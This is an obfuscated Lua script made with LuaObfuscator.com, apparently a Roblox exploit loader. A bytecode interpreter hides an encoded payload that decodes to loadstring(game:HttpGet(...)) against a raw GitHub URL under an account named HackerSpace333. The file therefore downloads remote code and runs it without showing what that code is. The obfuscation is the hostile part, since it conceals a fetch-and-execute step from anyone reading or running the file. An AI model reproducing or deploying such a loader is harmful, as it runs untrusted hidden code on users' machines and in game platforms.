--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v116=0;local v117;while true do if (v116==1) then return v117;end if (v116==0) then v117=v5(v86,v19);v19=nil;v116=1;end end else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((1809 -(282 + 595)) -(857 + (1711 -(1523 + 114)))))) ;return v87-(v87%1) ;else local v88=(570 -(367 + 201))^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (928 -(214 + 641 + 72))) or (0 + 0) ;end end local function v21() local v34=(0 + 0) -0 ;local v35;while true do if (v34==(1065 -(68 + 222 + 775))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=(961 -(892 + 65)) -3 ;end if (v34==(118 -(32 + 85))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * 256) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + 4 ;return (v41 * (16777566 -((213 -126) + 263))) + (v40 * ((48331 + 17385) -(67 + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,19 -(10 + 8) ,79 -59 ) * (((1813 -(814 + 45)) -(802 + 150))^32)) + v42 ;local v46=v20(v43,56 -35 ,55 -24 );local v47=((v20(v43,24 + 8 )==((1883 -(261 + 624)) -(915 + 82))) and  -((3 -1) -1)) or (1 + (1080 -(1020 + 60))) ;if (v46==(0 -(1423 -(630 + 793)))) then if (v45==(1187 -(1069 + 118))) then return v47 * (0 -0) ;else v46=1 -0 ;v44=0 + 0 ;end elseif (v46==(2819 -(201 + (1406 -835)))) then return ((v45==(1138 -(116 + 1022))) and (v47 * ((4 -(1 + 2))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(359 + 656 + 8) ) * (v44 + (v45/((793 -(368 + 423))^(184 -132)))) ;end local function v25(v48) local v49;if  not v48 then local v89=0 -0 ;while true do if (v89==(0 -0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(767 -((2049 -1304) + (82 -61))) );v18=v18 + v48 ;local v50={};for v67=1 + 0 + 0 + 0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90~= #":") then else if (v91== #"<") then v92=(function() return v93()~=0 ;end)();elseif (v91==(1826 -(1195 + 629))) then v92=(function() return v94();end)();elseif (v91== #"nil") then v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90==(0 -0)) then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if ((241 -(187 + 54))==v123) then v124=(function() return 780 -(162 + 618) ;end)();while true do if (v124==0) then v91=(function() return v93();end)();v92=(function() return nil;end)();v124=(function() return 1 + 0 ;end)();end if (v124==(1 + 0)) then v90=(function() return  #"]";end)();break;end end break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v52=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0 -0 ;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do if (v107==(0 -0)) then local v125=(function() return 0 + 0 ;end)();while true do if (v125~=0) then else v98=(function() return 1636 -(1373 + 263) ;end)();v99=(function() return nil;end)();v125=(function() return 1001 -(451 + 549) ;end)();end if (v125==(1 + 0)) then v107=(function() return 1;end)();break;end end end if (v107==(1 -0)) then local v126=(function() return 0 -0 ;end)();while true do if (v126~=(1384 -(746 + 638))) then else while true do if (v98~=(0 + 0)) then else v99=(function() return v100();end)();if (v101(v99, #"[", #"{")==(0 -0)) then local v163=(function() return 0;end)();local v164=(function() return;end)();local v165=(function() return;end)();local v166=(function() return;end)();local v167=(function() return;end)();while true do if (v163==(343 -(218 + 123))) then while true do if (v164~= #"19(") then else if (v101(v166, #"xxx", #"nil")~= #"}") then else v167[ #"xnxx"]=(function() return v102[v167[ #".dev"]];end)();end v103[v104]=(function() return v167;end)();break;end if (v164~= #" ") then else local v181=(function() return 1581 -(1535 + 46) ;end)();local v182=(function() return;end)();while true do if (v181==(0 + 0)) then v182=(function() return 0;end)();while true do if (v182~=1) then else v164=(function() return 2;end)();break;end if ((0 + 0)==v182) then v167=(function() return {v105(),v105(),nil,nil};end)();if (v165==(0 + 0)) then local v189=(function() return 0 -0 ;end)();local v190=(function() return;end)();while true do if (v189==0) then v190=(function() return 1467 -(899 + 568) ;end)();while true do if (0~=v190) then else v167[ #"19("]=(function() return v105();end)();v167[ #".dev"]=(function() return v105();end)();break;end end break;end end elseif (v165== #"~") then v167[ #"19("]=(function() return v106();end)();elseif (v165==2) then v167[ #"nil"]=(function() return v106() -((2 + 0)^(38 -22)) ;end)();elseif (v165~= #"-19") then else local v195=(function() return 603 -(268 + 335) ;end)();local v196=(function() return;end)();while true do if (v195==0) then v196=(function() return 0;end)();while true do if (v196~=(290 -(60 + 230))) then else v167[ #"-19"]=(function() return v106() -((574 -(426 + 146))^(2 + 14)) ;end)();v167[ #".com"]=(function() return v105();end)();break;end end break;end end end v182=(function() return 1457 -(282 + 1174) ;end)();end end break;end end end if (0~=v164) then else local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183~=0) then else v184=(function() return 811 -(569 + 242) ;end)();while true do if (v184==(2 -1)) then v164=(function() return  #"[";end)();break;end if (v184~=(0 + 0)) then else v165=(function() return v101(v99,1026 -(706 + 318) , #"asd");end)();v166=(function() return v101(v99, #"xnxx",1257 -(721 + 530) );end)();v184=(function() return 1;end)();end end break;end end end if ((1273 -(945 + 326))~=v164) then else local v185=(function() return 0 -0 ;end)();while true do if (1~=v185) then else v164=(function() return  #"91(";end)();break;end if (0==v185) then if (v101(v166, #"[", #"{")== #"/") then v167[2 + 0 ]=(function() return v102[v167[702 -(271 + 429) ]];end)();end if (v101(v166,2,2 + 0 )== #"}") then v167[ #"xnx"]=(function() return v102[v167[ #"91("]];end)();end v185=(function() return 1;end)();end end end end break;end if (v163==1) then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if ((1500 -(1408 + 92))==v177) then v178=(function() return 0;end)();while true do if (v178==1) then v163=(function() return 1088 -(461 + 625) ;end)();break;end if (v178~=0) then else v166=(function() return nil;end)();v167=(function() return nil;end)();v178=(function() return 1;end)();end end break;end end end if (v163==(1288 -(993 + 295))) then v164=(function() return 0 + 0 ;end)();v165=(function() return nil;end)();v163=(function() return 1;end)();end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end end end;end)();local v53=(function() return function(v108,v109,v110) local v111=(function() return 1171 -(418 + 753) ;end)();local v112=(function() return;end)();while true do if (v111~=(0 + 0)) then else v112=(function() return 0 + 0 ;end)();while true do if (v112==(0 + 0)) then local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if ((0 + 0)~=v127) then else v128=(function() return 529 -(406 + 123) ;end)();while true do if (v128~=0) then else local v173=(function() return 0;end)();while true do if (0~=v173) then else v108[v109-#" " ]=(function() return v110();end)();return v108,v109,v110;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #",",v58 do FlatIdent_89ECE,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_89ECE,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"xnx"]=(function() return v21();end)();for v70= #".",v23() do FlatIdent_1743D,Descriptor,v21,v20,v59,v54,v70,v22,v23=(function() return v52(FlatIdent_1743D,Descriptor,v21,v20,v59,v54,v70,v22,v23);end)();end for v71= #"/",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[407 -(118 + 287) ];local v66=v61[1772 -(1749 + 20) ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1 + 0 ;local v77= -(1323 -((3764 -2515) + 73));local v78={};local v79={...};local v80=v12("#",...) -(1 + 0) ;local v81={};local v82={};for v113=0 -0 ,v80 do if (v113>=v74) then v78[v113-v74 ]=v79[v113 + 1 + 0 ];else v82[v113]=v79[v113 + (1146 -(466 + 679)) ];end end local v83=(v80-v74) + ((306 -(244 + 60)) -1) ;local v84;local v85;while true do v84=v72[v76];v85=v84[2 -1 ];if ((v85<=(1906 -(106 + 1794))) or (2408<2109)) then if ((v85<=(2 + 0)) or (33==1455)) then if (v85<=(0 + 0)) then v82[v84[2 + 0 + 0 ]]=v63[v84[(477 -(41 + 435)) + 2 ]];elseif (v85==(2 -1)) then local v131=0 -0 ;local v132;while true do if (v131==(114 -(4 + 110))) then v132=v84[(1587 -(938 + 63)) -(57 + 527) ];v82[v132]=v82[v132](v13(v82,v132 + (1428 -(41 + 1386)) ,v77));break;end end else local v133=v84[105 -(17 + 86) ];local v134=v82[v84[3 + 0 ]];v82[v133 + (1330 -(797 + 532)) ]=v134;v82[v133]=v134[v84[3 + 1 + 0 ]];end elseif ((v85<=4) or (443>=4015)) then if (v85==(6 -3)) then v82[v84[(1129 -(936 + 189)) -2 ]]=v63[v84[8 -5 ]];else v82[v84[(56 + 112) -((1735 -(1565 + 48)) + 44) ]]=v84[(4 + 1) -2 ];end elseif (v85>(16 -11)) then local v142=v84[2 + 0 ];local v143=v82[v84[1 + (1140 -(782 + 356)) ]];v82[v142 + (1 -0) ]=v143;v82[v142]=v143[v84[69 -(30 + 35) ]];else local v147=v84[2 + (267 -(176 + 91)) ];local v148,v149=v75(v82[v147](v13(v82,v147 + (1258 -(1043 + 214)) ,v84[11 -8 ])));v77=(v149 + v147) -(1213 -(323 + 889)) ;local v150=0 -0 ;for v160=v147,v77 do v150=v150 + (581 -(361 + 219)) ;v82[v160]=v148[v150];end end elseif (v85<=((898 -553) -(144 + 192))) then if ((3382>166) and (v85<=(327 -(53 + 267)))) then v82[v84[1 + (1 -0) ]]();elseif (v85==(7 + (1093 -(975 + 117)))) then v82[v84[415 -(15 + 398) ]]();else local v151=982 -(18 + 964) ;local v152;while true do if (v151==(0 -0)) then v152=v84[2 + 0 ];v82[v152]=v82[v152](v13(v82,v152 + 1 + 0 ,v77));break;end end end elseif (v85<=(9 + (1877 -(157 + 1718)))) then if ((v85==(1985 -(1913 + 62))) or (280==3059)) then local v153=850 -(20 + 830) ;local v154;local v155;local v156;local v157;while true do if (v153==(0 + 0)) then v154=v84[5 -3 ];v155,v156=v75(v82[v154](v13(v82,v154 + (127 -(95 + 21 + 10)) ,v84[1 + (6 -4) ])));v153=739 -(542 + 196) ;end if (v153==(3 -1)) then for v174=v154,v77 do v157=v157 + 1 ;v82[v174]=v155[v157];end break;end if (v153==(1 + 0)) then v77=(v156 + v154) -(1 + 0) ;v157=0 + 0 ;v153=(6 -4) -(1018 -(697 + 321)) ;end end else do return;end end elseif (v85>(5 + 7)) then v82[v84[4 -(5 -3) ]]=v84[7 -4 ];else do return;end end v76=v76 + (1552 -(1126 + 425)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861636B657253706163653Q33312F536372697074732F726566732F68656164732F6D61696E2F41575300083Q00124Q00013Q00122Q000100023Q002006000100010003001204000300044Q000A000100034Q00095Q00022Q00083Q000100012Q000B3Q00017Q00",v9(),...);